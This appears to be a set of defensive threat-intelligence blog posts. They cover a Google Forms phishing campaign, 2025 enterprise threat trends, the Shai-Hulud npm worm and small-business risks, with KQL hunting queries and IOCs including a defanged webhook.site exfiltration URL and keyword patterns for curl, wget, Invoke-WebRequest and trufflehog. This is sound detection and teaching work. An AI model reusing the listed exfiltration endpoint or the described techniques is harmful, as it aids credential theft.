A phishing campaign is impersonating Google Forms to steal Google account credentials using fake job opportunity lures. Victims are directed to URLs resembling legitimate Google Forms pages (e.g., forms.google.ss-o[.]com) that generate personalized links and present a convincing form requesting personal details. Clicking “Sign in” redirects users to a credential-harvesting page hosted on a known phishing domain.
Masquerading adversary-in-the-middle (AiTM) credential harvesters continue to evolve and remain an effective method of initial access and credential theft. Organisations should continue strengthening and updating email policies and filtering controls. User awareness remains crucial for reporting and detecting these phishing attacks early.
Changes in Behaviour
This campaign shows increased sophistication through personalized phishing URLs, realistic Google Forms cloning, and redirection tactics that hide the payload from researchers.
Attackers leverage job-themed lures and likely distribute links via targeted email or LinkedIn outreach, aligning with ongoing trends exploiting remote work opportunities.
This aligns with a broader trend of actors using social engineering through job offers or advertisements to exploit user trust via trusted platforms such as Google and LinkedIn. Similar techniques have been observed in campaigns conducted by groups such as Lazarus, which have orchestrated sophisticated social engineering operations via LinkedIn.
Campaign Behaviour
Threat actors use domain impersonation and dynamic link generation to tailor phishing pages to individual victims. The fake form mimics Google branding and legal disclaimers to build trust, while the sign-in process redirects victims to a credential harvesting site.
Redirecting suspicious visits to Google search pages helps prevent detection and analysis.
Indicators of Compromise (IOCs)
forms.google.ss-o[.]com
id-v4[.]com(inactive)
generation_form.php hosted on phishing infrastructure
Fake Google Forms job application pages requesting Google sign-in credentials
Note: Assume additional infrastructure and IOCs may be in use.
Recommendations to Organisations and Defenders
Budosec is a solo-owned blog and is not sponsored by any vendors. The advice provided is vendor-neutral. Exact remediation steps will depend on your tooling; however, the guidance below applies broadly.
Detection Opportunities
See my GitHub for detection and hunting queries you can use for this campaign
Initial indicators
User reports suspicious email
Clicks on shortened or suspicious URLs
Navigation to domains with malicious or newly registered reputation
Further downstream indicators
Anomalous sign-ins from unseen locations
Impossible travel events
Suspicious inbox forwarding rules created
New MFA method or device added
Creating detections that correlate multiple events within a short timeframe is effective. Threat actors typically move quickly to establish persistence, expand access, and exfiltrate data.
Threat Hunting Guidance
Using DNSTwist, defenders can generate permutations of suspicious Google domains and perform a 90-day hunt across the environment (depending on log retention).
If using Microsoft Sentinel or similar platforms, run retrospective searches for these domains.
If IOCs are found:
Remove malicious emails from user inboxes
Block associated domains and infrastructure
If click-through activity is observed, follow up with the user immediately to determine whether credentials were entered.
If Credentials Were Entered
If a user entered credentials into a suspected phishing or AiTM page, treat the account as compromised immediately:
Force a password reset
Revoke all active sessions and refresh tokens to invalidate stolen cookies
Require reauthentication and re-register MFA methods
Remove unrecognized devices or security info changes
Review recent sign-ins for unfamiliar IPs, impossible travel, or anonymous proxy use
Audit and remove suspicious inbox rules, OAuth app consents, and forwarding settings
Check for data access anomalies and unauthorized downloads
Instruct the user to report unexpected MFA prompts
Monitor closely for follow-up activity or lateral movement attempts
2025 showed clear, practical shifts in what actually hurts enterprises day-to-day: identity and user execution was the popular path for threat actors. The year wasn’t packed with advanced persistent threat (APT) tradecraft for most enterprise environments. It was about scale: AI-assisted social engineering, commodity malware delivered through trusted platforms, and “make the user do it” execution Click-fix style chains that bypass controls.
What stood out most in 2025 was how heavily attackers leaned into trusted surfaces — Microsoft 365, Teams, browser sessions, GitHub/CDN-style hosting, and advertising platforms — while running the same repeatable playbooks at scale: infostealers to harvest credentials and tokens, followed by initial access, then ransomware or business email compromise (BEC). This wasn’t about novel tradecraft; it was about efficiency. Microsoft’s reporting and ENISA’s 2025 threat landscape both reinforce this shift, highlighting the growing scale of social engineering, faster exploitation cycles, and the increasing abuse of legitimate services as core drivers of modern enterprise compromise.
For obvious reasons I cannot be to specific, however Below are the patterns I saw repeatedly across 2025, and why they matter.
1) Infostealers
What changed in 2025
Infostealers aren’t “just password grabbers” anymore they’re an access factory. MaaS ecosystems like Lumma kept showing up with flexible delivery, fast iteration, and reliable stealing of browser data/session material that fuels downstream compromise.
How it showed up in enterprise
Initial access increasingly looked like “valid login + normal tools” because creds/tokens were already stolen.
Infostealers arrived via malvertising/redirect chains and were often staged on “normal looking” platforms (including developer/hosting ecosystems). Microsoft documented large-scale malvertising leading victims through redirectors and ultimately to payload hosting on platforms like GitHub.
Practical takeaways
Treat session theft as a first-class risk. In practice, conditional access, token protection, and device compliance matter far more than traditional password policies that involve complexity. Defenders should prioritise detections that focus on unusual browser credential access patterns, new persistence mechanisms appearing after “user-initiated” installer activity, and outbound connections to fresh or low-reputation infrastructure immediately following a download or ZIP execution.
Tips for hunting in Kusto query langauge (KQL)
Look for payloads being pulled from the internet
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "mshta.exe", "msbuild.exe", "rundll32.exe")
| where ProcessCommandLine has_any ("http", "https", "Invoke-WebRequest", "curl", "wget")
| join kind=inner (
DeviceNetworkEvents
| where RemoteIPType == "Public"
| where ActionType == "ConnectionSuccess"
) on DeviceId
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, RemoteIP, RemoteUrl
Look for non-browser processes touching credential stores
The big change wasn’t that AI invented new attack vectors ( that is changing), however it lowered the effort to produce high-volume, high-quality lures and impersonation content. Microsoft’s Digital Defence reporting explicitly calls out AI-enabled phishing and fast-evolving multi-stage chains as a key theme. ([Microsoft][1])
ENISA’s 2025 threat landscape also flags AI as a defining element, particularly around social engineering at scale. ([ENISA][4])
Waves of new reports and research are being released on the expected evolving Ai situation and how it will continue to change and affect the industry.
Faster iteration: lure themes changed weekly, not quarterly.
More multi-channel delivery (email + messaging + calls), which links directly to the next sections.
Practical takeaways
Stop relying on “users will spot bad grammar” as a control.
Harden identity workflows: phishing-resistant MFA where possible, stronger verification for payment/invoice changes, and out-of-band verification procedures that don’t depend on the same compromised channel.
AI and business email compromise (BEC) is a lethal combination. Users should feel comfortable reporting anything that seems out of place.
Investigation tips:
Check email context in the business environment
Does it relate to receipient users role. (IMPORTANT: this does not mean it is benign, but forumaltes part of your investigation)
Pull the email in alignment with your organisations arrangemenbt for viewing emails
– Look for any signs of spoofing in email authentication
– Analyse links and attachments (IMPORTANT: Links or attachments may not work in sandboxed environments this is threat actor design, don’t assume benign)
– Look for suspicious redirections or cloned sites that do no line up in the URL field.
– If suspicious move to the next phase and check if user interacted/ downloaded.
EmailEvents
| where TimeGenerated >= ago(90d)
| where SenderFromAddress contains "<insert email>"
// customise as you see fit, but establishing context is important, however again not a indication of benign.
TIP: Being a good analyst is about coming to accurate decisions in a reasonable amount of time, and justifying why you have come to a verdict based on the evidence.
3) Impersonation via WhatsApp and social media (trust hijack)
What changed in 2025
Attackers kept moving toward platforms where people respond quickly, and moves them out of site of security monitoring: WhatsApp, SMS, social Dms, and other encrypted collaboration applications. Even when the exact scam mechanics vary, the consistent pattern is impersonation, urgency or establishing trust via a high profile identity like a CEO for example..
How it showed up in enterprise
Finance/HR impersonation attempts outside email.
“Vendor” or “exec” outreach pushing invoice changes, gift cards, or urgent login steps.
Staff assuming WhatsApp/DM = “more legitimate” because it feels personal.
CEO or executive impersonation.
Practical takeaways
Write (and enforce) a policy: no financial approvals or credential workflows over consumer messaging apps.
Train staff to treat “new number, urgent request” as a default red flag and to verify via known channels.
4) Helpdesk phishing / identity resets
What changed in 2025
Threat groups kept proving that the helpdesk is a privileged access path. If an attacker can get a password reset or MFA change approved, they don’t need malware.
Australia’s ASD/ACSC guidance on Scattered Spider explicitly calls out social engineering of IT helpdesks to reset passwords/MFA as a core technique. ([cyber.gov.au][6])
CrowdStrike also described Scattered Spider activity expanding targets in 2025 with consistent tradecraft, reinforcing how operationally “standard” helpdesk abuse has become. ([CrowdStrike][7])
How it showed up in enterprise
MFA resets and enrollment changes followed by rapid access to M365/SSO apps.
Attackers living inside collaboration platforms after identity takeover (including Teams/communications abuse). Microsoft discussed threats targeting Teams and how attackers leverage password resets/MFA control to operate. ([Microsoft][8])
Practical takeaways
Lock down helpdesk workflows:
Require strong identity verification for resets (not KBA).
Add “cool-off” periods or manager approval for MFA changes on privileged accounts.
Alert on MFA method changes + new device + new geo sequences.
5) Trojanised installers ads + fake sites leading to stealers/loaders/RATs
What changed in 2025
Fake installers stayed brutally effective because they exploit normal behaviour (“I need this tool now”). The distribution got better: sponsored ads, SEO poisoning, and “looks real enough” landing pages.
Kaspersky described a macOS infostealer campaign using paid search ads and even abuse of shared AI chat links to lure users into running commands that install an infostealer/backdoor. ([me-en.kaspersky.com][9])
This is the same underlying enterprise lesson: users will trust what’s at the top of search results if it looks official.
One example is that of the fake PuTTY installers. PuTTY is a commonly used tool by IT professionals, it is a lightweight Windows tool used to make remote command-line connections to other systems. Recent campaigns have exploited this tools widespread use in the enterprise environment. Artic Wolf
Initial foothold becoming infostealer → then remote access tooling or loader deployment.
Practical takeaways
Restrict execution of new/untrusted installers where possible (application control).
Browser controls matter: block known bad ad/redirect infrastructure, enforce safe browsing, and monitor for first-time installs from user profile/temp locations.
Sponsored malicious PuTTY advertisements. Image from (Artic Wolf)
6) ClickFix (make the user run the payload)
What changed in 2025
ClickFix is one of the most important “enterprise reality” shifts: attackers intentionally add a human step (copy/paste or run a command) to bypass controls that are better at blocking automated droppers.
Microsoft broke down ClickFix as a social engineering technique: lure the user to execute command followed by malware chain. ([Microsoft][10])
Huntress also documented ClickFix campaigns delivering infostealers (including Lumma and others), showing how it ties directly into the credential-theft economy. ([Huntress][11])
Clipboard-driven PowerShell execution that looks like “user did it” (because they did).
Practical takeaways
Train specifically on “never run commands from a webpage / email” (most training is too generic).
Detection focus: suspicious parent/child chains and command lines around PowerShell/mshta/msbuild/rundll32 triggered shortly after browser activity.
Fake verification getting a user to open WindowsRun to launch PowerShelll. Image from Proofpoint
7) AiTM phishing using site clones / brand impersonation (MFA bypass remains common)
What changed in 2025
AiTM phishing stayed dominant because it beats basic MFA by stealing session cookies/tokens via reverse proxies and realistic clones.
Sekoia’s 2025 analysis highlights the scale and prevalence of AiTM kits (Tycoon 2FA and others) and notes rapid evolution in delivery formats (e.g., shifting attachment/link delivery techniques). ([Sekoia.io Blog][12])
Barracuda also discussed the volume and evolution of phishing-as-a-service and AiTM-style kits in 2025 targeting Microsoft 365. ([Barrcuda Blog][13])
How it showed up in enterprise
Microsoft 365 account takeovers where the login looked legitimate (because it was proxied).
“New MFA prompt” fatigue exploited to complete the chain.
Practical takeaways
Push toward phishing-resistant MFA for high-risk users (where feasible).
Alert on sign-in from new device + token issuance + mailbox rules changes (classic post-phish behaviour).
Wrap-up: the 2025 pattern in one line
2025 was the year attackers doubled down on identity + user execution while hiding behind trusted platforms and accelerating with AI-assisted scale. This has been my personal experience in my role, across all these various threats. While there is some variations this has been a consistent theme. I have not included extensions in this blog, however I am going to go into more detail on malicious extensions in the next blog.
Hopefully this blog for new or aspiring analyst has given you a firm idea of the threat environment particularly for the enterprise environment. By staying up to date on threat intelligence and strategic shifts you will be stronger as a defensive analyst and will move to proactive security.
Hunting Shai-Hulud: Detecting the npm Supply-Chain Worm with Sentinel
Shai-Hulud is a self-replicating npm supply-chain worm that slipped malicious post-install scripts into popular packages to steal secrets like npm/GitHub tokens, cloud keys, and create/modify GitHub repos & workflows for exfiltration, and then auto-publish poisoned updates wherever it found additional npm tokens—letting it spread across the ecosystem. Initial tallies cited 100+ affected packages; subsequent advisories and vendor tracking raised the scope to hundreds (500+ reported in some counts), so teams should assume impact is still evolving.
Behaviour
The Shai-Hulud worm behaves as a malicious npm package payload that executes a post-install script to harvest secrets (npm tokens, GitHub tokens, API keys, cloud credentials), then exfiltrates them to attacker-controlled GitHub repos and webhooks. It goes further by creating malicious GitHub Actions workflows to continuously leak secrets, and it forcibly migrates private repositories into public attacker-owned repos with a “Shai-Hulud Migration” tag. Critically, if additional npm tokens are present, it will auto-publish infected versions of any accessible packages, giving it worm-like, self-propagating capabilities across the npm ecosystem.
This is a massive supply chain attack and organisations if not already should treat this with high priority. This article is provided as a quick threat intelligence report you can read, although many sources and research is availible. This article goes into some KQL ( Kusto Query Language) scripts you can use to hunt for this activity. This article may also be benficial for new analyst who want to understand how to break down threat intelligence or research articles into actionable or useful bits of information for security operations.
Indicators of Compromise
Files & paths
/tmp/processor.sh — creates shai-hulud branch and uploads workflow payload.
/tmp/migrate-repos.sh — forces private repos → public “migration.”
Temp working dir observed: /tmp/github-migration (used during repo cloning).
GitHub artifacts / repo signals
Public repos named Shai-Hulud containing data.json (double-base64 secrets dump).
Repos with description “Shai-Hulud Migration” and -migration suffix (private → public flip). Look for a CreateEvent followed quickly by a PublicEvent.
Branches named shai-hulud created across impacted repos; hidden workflow commits under .github/workflows/*.yml.
Network / exfil endpoints
https://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 (noting free-tier deactivated after excessive activity; secrets may still appear in GitHub workflow logs).
Automated npm publish from unexpected actors/machines (worm propagation).
Creation/modification of .github/workflows/* followed by unusual GitHub API POST/PUT events.
KQL Queries
Let’s jump into crafting a query we can use to hunt. This query can be adpated to whatever SIEM ( security incident event management) tool you are using or are learning with. KQL is the language I use so I am going to work with that.
let lookback = 7d;
let procs = DeviceProcessEvents
| where TimeGenerated >= ago(lookback)
| where FileName in ("node.exe","npm.exe","yarn.exe","git.exe","gh.exe")
| where ProcessCommandLine has_any ("postinstall","preinstall","install","bundle.js","eval(","trufflehog","gh repo create","push","remote add","api.github.com")
| project TimeGenerated, Source = "Process", DeviceName, AccountName, FileName, ProcessCommandLine;
let files = DeviceFileEvents
| where TimeGenerated >= ago(lookback)
| where FilePath has ".github\\workflows" or FileName in ("processor.sh","migrate-repos.sh")
| project TimeGenerated, Source = "File", DeviceName, AccountName, FilePath, FileName, ActionType, SHA256;
procs
| union files
| sort by TimeGenerated desc
| take 200
Set the variable for time and the table you want to call in. This is a good habit to get into because it will make creating bigger queries further down the track easier.
We are interested in Filename table and Processcommandline to detect the workflows we are looking for or any the /tmp/*.sh files the worm drops.
We are creating a second vairable to call to DeviceFileEvents.
In that KQL, the union operator is simply combining the results of two separate queries into one table.
The first part (procs) collects suspicious process events (e.g., npm install with postinstall, trufflehog, etc.).
The second part (files) collects suspicious file events (e.g., .github/workflows changes or /tmp/processor.sh).
union merges them together so you can review all suspicious signals in one results set instead of running two separate queries. If your just starting playing around running the queries separately and exploring the logs is good to, for getting a feel of the tables.
This query might be a bit noisy, however when hunting for activity we want to start wide and then narrow it down. It is good to get a sense for what is benign and what might be worth looking further into. The -migration will likely pull in legitimate migration activity, but again double checking might not hurt. You can start to filter out certain fields that you don’t want to see to narrow the information down.
Takeaways and Recommendations
The Shai-Hulud incident shows how fast a supply-chain compromise can spread and why proactive hunting matters. This mindset builds resilience for organisations and sharpens investigative skills for analysts.
Always review new threat reports for relevance to your environment.
If risk is high, run a targeted hunt rather than waiting for alerts.
Maintain strong monitoring and tuned detections around Git and npm activity.
Enforce clear policies for developer workflows and package use.
Rotate and protect credentials aggressively after any suspected compromise.
The Biggest Cyber Threats Small Businesses Face in 2026
Introduction
“43% of cyberattacks target small businesses, yet 60% close within 6 months of a breach.”
The world is moving deeper into the tech space with rapid cloud adoption and an accelerating AI race. For small businesses, this creates both opportunity and risk. Cybersecurity is no longer just a “big business” concern — the evolving threat landscape directly impacts small and medium enterprises (SMEs) as they scale and adopt new technology to streamline operations.
The reality is cybercrime is evolving quickly, and it will eventually affect nearly everyone connected to the digital space. In this blog, we’ll break down the top cyber threats facing small businesses in 2026 and provide actionable defense strategies to help you stay secure.
Threat #1 – Ransomware-as-a-Service (RaaS)
Ransomware has long been a headline threat, but now it’s more accessible than ever. Cybercriminals can purchase Ransomware-as-a-Service (RaaS) kits that come with dashboards, technical support, and user-friendly interfaces — lowering the barrier to entry even for low-skill attackers.
Impact on small businesses:
Data loss
Downtime and disruption
Ransom payments
Reputational damage
Why SMEs are targeted: Larger organizations draw heavy scrutiny from law enforcement and security teams. Targeting smaller firms presents attackers with lower risk, higher volume, and a greater chance of ransom payment due to fear of reputational damage.
Defense strategies:
Maintain regular, tested backups of critical data
Patch and update operating systems and applications consistently
Deploy endpoint detection and response (EDR) solutions
Store offline, immutable backups segmented from production
Threat #2 – Phishing & Business Email Compromise (BEC)
Phishing remains the #1 entry point for attacks. Business Email Compromise (BEC) is particularly dangerous:
If a third-party supplier’s email is compromised, malicious emails may appear legitimate to your staff.
If your business email is breached, attackers can impersonate executives, escalate privileges, spread malware, and exfiltrate sensitive data.
In 2026, AI-generated phishing emails and voice deepfakes make detection harder. Messages that once looked obviously fake now require deeper analysis and stricter verification.
Defense strategies:
Conduct regular employee awareness training
Enforce multi-factor authentication (MFA) on all accounts
Use advanced email filtering and attachment/link sandboxing
Implement call-back/secondary-channel verification for financial or sensitive requests
Threat #3 – Supply Chain Attacks
Attackers increasingly compromise third-party vendors and SaaS platforms to target downstream clients. Recent incidents show how one weak link can impact many organizations.
Small businesses rely heavily on vendors and SaaS tools, making this risk unavoidable. The key is understanding risk tolerance and preparing for risks you cannot entirely eliminate.
Continuously monitor third-party integrations and API connections
Apply least-privilege access and scoped tokens for vendor accounts
Threat #4 – Cloud Misconfigurations & Data Leaks
As cloud adoption soars, misconfigured storage buckets and databases remain prime targets. Attackers constantly scan for exposed services, and simple mistakes can lead to devastating breaches.
Defense strategies:
Implement Cloud Security Posture Management (CSPM) and remediate findings
Encrypt sensitive data at rest and in transit
Enforce strong access controls, logging, and periodic permissions reviews
Enable private endpoints, network segmentation, and WAF where applicable
Threat #5 – Insider Threats & Human Error
Remote and hybrid work expands the attack surface. Insider threats — whether intentional or accidental — represent a significant risk for SMEs.
Examples:
Unintentional mistakes (e.g., emailing sensitive data to the wrong recipient)
Disgruntled employees deleting or leaking data after termination
Malicious insiders motivated by financial gain or coercion
Defense strategies:
Enforce the principle of least privilege (only the access needed for the job)
Restrict access to approved, compliant devices; use device posture checks
Apply conditional access policies and geo-restrictions
Implement Data Loss Prevention (DLP) and insider risk monitoring
AI is accelerating both offense and defense. Threat actors leverage AI to:
Automate phishing and social engineering
Crack passwords and test credentials more efficiently
Create deepfake audio/video to impersonate executives
Defense strategies:
Adopt a zero-trust approach (assume breach, verify explicitly, least privilege)
Deploy anomaly detection/UEBA to catch unusual behavior
Out-of-band verification for sensitive instructions and transactions
Takeaway
For small and medium businesses, improving security doesn’t need to be the most expensive or difficult process. These are some basic implementations you can add to your business. You can enable multi-factor authentication (MFA) everywhere (email, VPN, cloud apps), keep systems and firmware patched, and back up critical data offline with regular restore tests. Run phishing simulations to strengthen employee awareness, and maintain a documented incident response plan with clear roles and contacts. Centralize logging and monitoring with EDR/XDR, segment networks to limit lateral movement, and review third-party access regularly while rotating API keys or tokens.
Engaging a pay-per-session or retained security consultant is an excellent way for small and scaling businesses to strengthen their defenses. An experienced consultant can provide expert guidance, proactive monitoring, and tailored support that aligns with your business goals. They can identify gaps in your current security infrastructure, recommend practical improvements using the resources you already have, and design a roadmap that factors in long-term growth and scalability.
Conclusion
Cybersecurity is no longer optional for small businesses. The threats in 2026 from RaaS to AI-driven attacks demand proactive defense. By applying strong cyber hygiene, adopting modern security tools, and fostering a culture of awareness, small businesses can defend themselves against today’s most pressing threats and build resilience for the future.
